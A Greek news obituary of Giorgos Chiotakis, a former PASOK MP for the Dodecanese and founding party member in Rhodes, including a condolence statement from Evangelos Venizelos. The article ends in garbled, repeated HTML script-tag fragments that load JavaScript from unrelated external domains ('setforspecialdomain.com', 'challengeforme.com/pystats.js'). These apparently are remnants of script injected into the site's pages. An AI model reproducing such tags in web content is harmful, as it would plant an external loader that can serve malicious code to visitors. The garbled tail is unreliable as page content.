Απεβίωσε πρώην βουλευτής του ΠΑΣΟΚ

Πέθανε ο πρώην βουλευτής και ιστορικό στέλεχος του ΠΑΣΟΚ Γιώργος Χιωτάκης

Πλήρης ημερών, σε ηλικία 92 ετών απεβίωσε ο πρώην βουλευτής Δωδεκανήσων του ΠΑΣΟΚ και ιστορικό στέλεχος του κόμματος, Γιώργος Χιωτάκης.

Γεννημένος στην Κάρπαθο το 1922, σπούδασε Νομική και άσκησε επί δεκαετίες δικηγορία, ενώ εξελέγη δύο φορές βουλευτής με το ΠΑΣΟΚ τη δεκαετία του 1980.

Προερχόμενος άλλωστε από την Ένωση Κέντρου, υπήρξε ιδρυτικό στέλεχος του ΠΑΣΟΚ στη Ρόδο και κεντρικό στέλεχος επί εικοσαετία τουλάχιστον. Η κηδεία του Γιώργου Χιωτάκη θα γίνει αύριο Τετάρτη.

Τα συλλυπητήριά του για τον θάνατο του Γιώργου Χιωτάκη, εξέφρασε ο πρόεδρος του κόμματος Βαγγέλης Βενιζέλος:
«Αποχαιρετούμε με συγκίνηση και σεβασμό τον Γιώργο Χιωτάκη, ένα ιστορικό στέλεχός μας και ιδρυτικό μέλος του ΠΑΣΟΚ στη Ρόδο, ο οποίος σε όλη του τη ζωή, υπηρέτησε τις ιδέες και τους στόχους της δημοκρατικής παράταξης. Ο Γιώργος Χιωτάκης υπηρέτησε, εκτός από την κεντρική πολιτική σκηνή, και την τοπική αυτοδιοίκηση, πάντα με την ίδια συνέπεια και αγωνιστικότητα. Στην οικογένειά του απευθύνω τα θερμά συλλυπητήρια όλων των στελεχών του ΠΑΣΟΚ», είπε.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >